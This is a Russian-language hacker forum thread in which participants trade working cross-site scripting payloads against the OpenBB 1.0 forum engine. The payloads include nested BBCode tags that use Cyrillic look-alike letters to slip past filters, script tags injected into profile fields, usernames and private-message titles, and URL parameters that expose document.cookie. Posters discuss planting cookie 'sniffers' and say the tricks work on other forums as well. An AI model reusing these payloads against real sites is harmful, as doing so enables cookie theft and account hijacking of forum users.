OpenBB 1.0 (уязвимы возможно и другие версии) Травиально. как всегда через руские буквы Code: [еmаil=[url=http://=`][/url]]aaa[/emаil]`style=background:url(javascript:alert()); [cоlor=[url=http://=`]a[/url]]a[/colоr]`style=background:url(javascript:alert()); [sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert()); Есть ещё XSS, в основном с использованием других тегов, найти их очень просто, я их не пишу. Пример работы уязвимости: http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87
КЕЗ, ты на локалхосте её сначала проверял? Я тож как узнал про уязвимости сразу на оффсайт, думаю скачаю, поищу, тока ни оффсайт, ни другие сайты, ссылки с которых ведут на оффсайт, не фурачат =( И вот мля опять я опаздал =( З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.
Это фигня с securitylab.ru. А свои теги я сам нашел... И как я их мог НЕ ПРОВЕРЯТь на локалхосте? Конечно проверял. Самый обычные XSS
Не, я не то имел ввиду. Просто(может я галимо искал), но во время приведенного мной описания релиза оффсайт не работал. Вот это я и спросил... Забей кароче....я просто хотел узнать где и когда ты его качнул, хочу сам посмотеть. З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.
примитивные... да... они подойдут и к другим форумам кстате... емейл, урл, имадж - самые распространенные... а сколько на форуме SQL inj
Вот зайди щас на оффсайт: http://www.openbb.com/ и ты поймеш мой вопрос. Где ты его взял? Потому что, толи я галимо ищу, толи его хер где найдеш нормальный. Дай плиз ссылку, где качал. Мне оч интересно самому посмотреть.
Алгол, все верно, я же только что проверял на форумах и локалхосте. Может там изза того что я буквы заменил на руские или форум чтото пропарсил
1. Уязвимости в профиле пользователя. Уязвимыми являются все поля, кроме поля Homepage, а именно, поля:Email, AOL, Yahoo!, Location, MSN, Biography, Occupation, Homepage Description, но не во все поля можно поместить сниффер, так как количество вводимых символов в них, ограниченное. Хотя локальным алертом насладится можно=) Полноценно вставить снифф позволяют только такие поля, как: MSN, Biography, Occupation, Homepage Description. При просмотре профиля пользователя с форума, получаем такую вот штуку: Code: <td><font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="1" color="#000000">[b]<script>alert()</script>[/b]</font></td> Лол, никаких фильтров...красота=) 2. Уязвимость в нике пользователя. Хоть полноценный сниффер нам вставить и не удастся, но для приколов использовать можно. В данном движке, на главной странице всегда указывается последний зарегестрированный пользователь. Так как никаких блокировок и фильтраций нет, можно зарегестрировать пользователя: <script>alert('fuckyou')</script>, и каждый кто будет заходить на главную, будет ловить этот алерт=) 3. Уязвимость в заголовках личных сообщений. История сходна с форумным движком MercuryBoard. Заголовок личного сообщения не фильтрует символы. В итоге, в папке входящие, заголовок сообщения будет отображатся, как: Code: <font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"><b>[b]123<script>alert(document.cookie)</script>[/b]</b></font></a></td> P.S. Есть ещё дырявые bb теги, javascript:alert() [urІ=javascript:alert()]ClickME[/urI] но на сёгодня уже всё, башка у меня уже не варит чтоб сегодня что-то ещё выжать....=( =( =( P.P.S. Кстати, что это за хеширование идет? КЕЗ, ты был прав, куки очень странные.=(
Code: member.php?action=list&sortorder=homepage&perpage=[b]"><img%20src=javascript:alert(document.cookie)>[/b] Code: member.php?action=list&sortorder=homepage&perpage=25&reverse=1[b]"><img%20src=javascript:alert(document.cookie)>[/b] Code: member.php?action=list&sortorder=[b]"><img%20src=javascript:alert(document.cookie)>[/b] _____________________________________ Хотя пользы с них минимум, но тем немение....
Вообще почему на секлабе не пишут про вложеные теги никогда. только про дыры в профиле типа как ты привел
Кез фиг знат.. на секлабе много про что не пишут.. Вложенные теги - это все-таки не фундаментальная технология, да плюс ко всему вроде как недавно только нашли, пускай парсинг правильно организовывают. Уместнее было бы спросить почему не получило широкой огласки бага с кодировками в Ie
Потомучто seclab.ru только публикуют новости, котрые дает им бабушка ЧеГевары, сами они найти ниче не в состоянии. А бабшука ЧеГевары нехочет чтобы на фигне вроде секлаба были реальные баги.